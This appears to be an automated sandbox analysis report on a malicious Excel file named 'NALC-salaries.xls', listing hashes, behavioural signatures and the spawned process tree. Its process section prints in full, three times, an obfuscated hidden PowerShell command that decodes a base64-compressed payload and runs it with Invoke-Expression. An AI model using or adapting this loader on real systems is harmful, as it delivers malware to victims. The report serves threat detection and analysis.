Analysis
-
max time kernel
306s -
max time network
313s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-uk -
resource tags
arch:x64arch:x86image:win10v2004-20240412-uklocale:uk-uaos:windows10-2004-x64systemwindows -
submitted
18-04-2024 22:33
Behavioral task
behavioral1
Sample
NALC-salaries.xls
Resource
win10v2004-20240412-uk
General
-
Target
NALC-salaries.xls
-
Size
43KB
-
MD5
8c64f107dd064147dd04ee265eef47c3
-
SHA1
22ffb010c8a41c9dabb0927bf432fb25bd78d323
-
SHA256
cafeb5969425e4392f7c0df31a1f66a254e5654dd9a8143e6c28b8fbf0535a7a
-
SHA512
7122c4e25d372313bff688cacfd5301ea4d02b064ffa7f282e502f9e20c4125232b77ea8786664075e8c327668bd4230b32ca8c40de01d822542ea840e57bf4d
-
SSDEEP
768:mzmB+k3hOdsylKlgryzc4bNhZFGzE+cL2knAJgRX42AAbXwrlIRbxCca8yfMy3:+k3hOdsylKlgryzc4bNhZFGzE+cL2kn4
Malware Config
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3124 4196 powershell.exe 81 Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 456 4196 powershell.exe 81 Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4616 4196 powershell.exe 81 -
Blocklisted process makes network request 3 IoCs
flow pid Process 20 3124 powershell.exe 54 456 powershell.exe 58 4616 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4196 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3124 powershell.exe 3124 powershell.exe 456 powershell.exe 456 powershell.exe 4616 powershell.exe 4616 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4196 EXCEL.EXE -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3124 powershell.exe Token: SeDebugPrivilege 456 powershell.exe Token: SeDebugPrivilege 4616 powershell.exe -
Suspicious use of SetWindowsHookEx 16 IoCs
pid Process 4196 EXCEL.EXE 4196 EXCEL.EXE 4196 EXCEL.EXE 4196 EXCEL.EXE 4196 EXCEL.EXE 4196 EXCEL.EXE 4196 EXCEL.EXE 4196 EXCEL.EXE 4196 EXCEL.EXE 4196 EXCEL.EXE 4196 EXCEL.EXE 4196 EXCEL.EXE 4196 EXCEL.EXE 4196 EXCEL.EXE 4196 EXCEL.EXE 4196 EXCEL.EXE -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 4196 wrote to memory of 3124 4196 EXCEL.EXE 86 PID 4196 wrote to memory of 3124 4196 EXCEL.EXE 86 PID 4196 wrote to memory of 3124 4196 EXCEL.EXE 86 PID 4196 wrote to memory of 456 4196 EXCEL.EXE 92 PID 4196 wrote to memory of 456 4196 EXCEL.EXE 92 PID 4196 wrote to memory of 456 4196 EXCEL.EXE 92 PID 4196 wrote to memory of 4616 4196 EXCEL.EXE 94 PID 4196 wrote to memory of 4616 4196 EXCEL.EXE 94 PID 4196 wrote to memory of 4616 4196 EXCEL.EXE 94
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\NALC-salaries.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4196 -
C:\Windows\syswow64\windowspowershell\v1.0\powershell.exeC:\Windows\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\" nVRRb9pIEH7nV4ysPclWsHGApg1WpKakaXNXUi6kSe8QOi32gLesd531OphQ/vuNiY+kr/fi9Yxn5/tm5huzBziD905reiHlVZZrY11nhUah7HWDRErHm0FezqWIobDc0oGVpe9wpezYGrgTxpZcnkupY7fxyfw8SQwWRRtKoSwk64l4wsZYPMdSKq1uN/mLe2y0xdh60f/mMjTILd6mdCQvXJ7tc2uNmJcWX5GyPF49MzsEk8/YA/uDe8wNz5CwDpf3WFTCpeTL15HPaFcJleG8b1mz2bKEOuycfxhefLz89Pnq9z++jK6/jv+8mdx+u7v//tfffB4nuFim4sdKZkrnD6aw5eO62jyFx91e/83J23enTnCrhyk358bwjeu1FqWKa3SIXfbobcGgLakPrjsldtPZDNjjrzfgJ4yQF6VB/+v8B7UZ/EmZeQE94DcIq+MwBB8f4LTr7V6yW9iyRc3eiY6DoPdzoam4OPX1PgV9OzoDlkzdJVrfcJXoDPyMVyKjrCwJvqBa2tSb7aKGH1tEr7IjbCE3OqZWw3bKa6IzVhEcPY6A/bOLAFVCFCpiX5AaGlzYugrX/xk3e1wvUKQF19vtXgEst0CMwWXiLIyYAF9aOOnT29GRt2UpIdmIrWrAhBAwAmgKpCsSBPFdUVxRB6Q1IxmBWIBLPS88Dw5dpwiCbQzn9PH7N4fKnF6jDSZoHkWMY01jGXHFl2hmg0HtRTNEY8VC0CbgHZci2ctpyKWckywJc8usKXEXsYyMayq4GdxkU1jMgjr9Pc6HUqCyUYtlwWcSHpoiIPm6Tlmg8QlPWacNzkg/CSl5px+ExF9nOYHNJVU8mlx9hJPgOIJ7QX1cF3B96zlexBSBLiOYfthY3Asqr9uQBRd6raTmyQW33HVSa/Ni0OkUlhoXxFKXSSW5WdK7zgb9fq/TibsdphzwWkxTBuLm11tPOsFsjuYCF0KJ/bTYA/jXtGXgEJVe1wFfkVXkPEbYey6buRbg57wobGrKFqvOmB4MfvkLhW2WN9prh1UvDEM6+qEXTZvW3ZTKigwDWlo0Om+GVAQjboqUS5rQUOcbl+VtCNswfd7tmcsq2ikyel3X89pwAKlLoyuvfz6E2GZVuz7Cevd0aX1VShLQ/gfjTyRiTiuIsSaFvzvph+GOhBCn292/ \" )))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3124
-
-
C:\Windows\syswow64\windowspowershell\v1.0\powershell.exeC:\Windows\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\" nVRRb9pIEH7nV4ysPclWsHGApg1WpKakaXNXUi6kSe8QOi32gLesd531OphQ/vuNiY+kr/fi9Yxn5/tm5huzBziD905reiHlVZZrY11nhUah7HWDRErHm0FezqWIobDc0oGVpe9wpezYGrgTxpZcnkupY7fxyfw8SQwWRRtKoSwk64l4wsZYPMdSKq1uN/mLe2y0xdh60f/mMjTILd6mdCQvXJ7tc2uNmJcWX5GyPF49MzsEk8/YA/uDe8wNz5CwDpf3WFTCpeTL15HPaFcJleG8b1mz2bKEOuycfxhefLz89Pnq9z++jK6/jv+8mdx+u7v//tfffB4nuFim4sdKZkrnD6aw5eO62jyFx91e/83J23enTnCrhyk358bwjeu1FqWKa3SIXfbobcGgLakPrjsldtPZDNjjrzfgJ4yQF6VB/+v8B7UZ/EmZeQE94DcIq+MwBB8f4LTr7V6yW9iyRc3eiY6DoPdzoam4OPX1PgV9OzoDlkzdJVrfcJXoDPyMVyKjrCwJvqBa2tSb7aKGH1tEr7IjbCE3OqZWw3bKa6IzVhEcPY6A/bOLAFVCFCpiX5AaGlzYugrX/xk3e1wvUKQF19vtXgEst0CMwWXiLIyYAF9aOOnT29GRt2UpIdmIrWrAhBAwAmgKpCsSBPFdUVxRB6Q1IxmBWIBLPS88Dw5dpwiCbQzn9PH7N4fKnF6jDSZoHkWMY01jGXHFl2hmg0HtRTNEY8VC0CbgHZci2ctpyKWckywJc8usKXEXsYyMayq4GdxkU1jMgjr9Pc6HUqCyUYtlwWcSHpoiIPm6Tlmg8QlPWacNzkg/CSl5px+ExF9nOYHNJVU8mlx9hJPgOIJ7QX1cF3B96zlexBSBLiOYfthY3Asqr9uQBRd6raTmyQW33HVSa/Ni0OkUlhoXxFKXSSW5WdK7zgb9fq/TibsdphzwWkxTBuLm11tPOsFsjuYCF0KJ/bTYA/jXtGXgEJVe1wFfkVXkPEbYey6buRbg57wobGrKFqvOmB4MfvkLhW2WN9prh1UvDEM6+qEXTZvW3ZTKigwDWlo0Om+GVAQjboqUS5rQUOcbl+VtCNswfd7tmcsq2ikyel3X89pwAKlLoyuvfz6E2GZVuz7Cevd0aX1VShLQ/gfjTyRiTiuIsSaFvzvph+GOhBCn292/ \" )))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:456
-
-
C:\Windows\syswow64\windowspowershell\v1.0\powershell.exeC:\Windows\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\" nVRRb9pIEH7nV4ysPclWsHGApg1WpKakaXNXUi6kSe8QOi32gLesd531OphQ/vuNiY+kr/fi9Yxn5/tm5huzBziD905reiHlVZZrY11nhUah7HWDRErHm0FezqWIobDc0oGVpe9wpezYGrgTxpZcnkupY7fxyfw8SQwWRRtKoSwk64l4wsZYPMdSKq1uN/mLe2y0xdh60f/mMjTILd6mdCQvXJ7tc2uNmJcWX5GyPF49MzsEk8/YA/uDe8wNz5CwDpf3WFTCpeTL15HPaFcJleG8b1mz2bKEOuycfxhefLz89Pnq9z++jK6/jv+8mdx+u7v//tfffB4nuFim4sdKZkrnD6aw5eO62jyFx91e/83J23enTnCrhyk358bwjeu1FqWKa3SIXfbobcGgLakPrjsldtPZDNjjrzfgJ4yQF6VB/+v8B7UZ/EmZeQE94DcIq+MwBB8f4LTr7V6yW9iyRc3eiY6DoPdzoam4OPX1PgV9OzoDlkzdJVrfcJXoDPyMVyKjrCwJvqBa2tSb7aKGH1tEr7IjbCE3OqZWw3bKa6IzVhEcPY6A/bOLAFVCFCpiX5AaGlzYugrX/xk3e1wvUKQF19vtXgEst0CMwWXiLIyYAF9aOOnT29GRt2UpIdmIrWrAhBAwAmgKpCsSBPFdUVxRB6Q1IxmBWIBLPS88Dw5dpwiCbQzn9PH7N4fKnF6jDSZoHkWMY01jGXHFl2hmg0HtRTNEY8VC0CbgHZci2ctpyKWckywJc8usKXEXsYyMayq4GdxkU1jMgjr9Pc6HUqCyUYtlwWcSHpoiIPm6Tlmg8QlPWacNzkg/CSl5px+ExF9nOYHNJVU8mlx9hJPgOIJ7QX1cF3B96zlexBSBLiOYfthY3Asqr9uQBRd6raTmyQW33HVSa/Ni0OkUlhoXxFKXSSW5WdK7zgb9fq/TibsdphzwWkxTBuLm11tPOsFsjuYCF0KJ/bTYA/jXtGXgEJVe1wFfkVXkPEbYey6buRbg57wobGrKFqvOmB4MfvkLhW2WN9prh1UvDEM6+qEXTZvW3ZTKigwDWlo0Om+GVAQjboqUS5rQUOcbl+VtCNswfd7tmcsq2ikyel3X89pwAKlLoyuvfz6E2GZVuz7Cevd0aX1VShLQ/gfjTyRiTiuIsSaFvzvph+GOhBCn292/ \" )))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4616
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD54280e36a29fa31c01e4d8b2ba726a0d8
SHA1c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
-
Filesize
18KB
MD5a7fd1ad3605e38b297bf8751b02d37f9
SHA1e142797a2e201ec6d46fae3d479b78782b5fe06a
SHA256c2917a3e868ec321871b873897be8a789637fffa03603684c2aff30dc63993c8
SHA5125467c9720fafbb609b772e11a6b7edd91d77e05f71e2808d4c54f9e38c65bf67e20f6127b1cd960548f793caefce68848c0db5a2109b1a7bf16a573d763b45a8
-
Filesize
18KB
MD5d3c09b82930c0175ac7743cec228a246
SHA18985696a824844821f4a66d7871e2b4bf61b5d8a
SHA2566ce4154dfaeadec41831182dc34dceb64eb19e3d90fc95edde65f02c9b3213b6
SHA512885f5dad7cf045514a4d3f50cb70a74ef8613c58fb7ca78b3e7b64565d1ee1fa3a28e0ec649bed864d6f54608543c1250b664c0ff85f9e4ce147c1b5abf0760b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82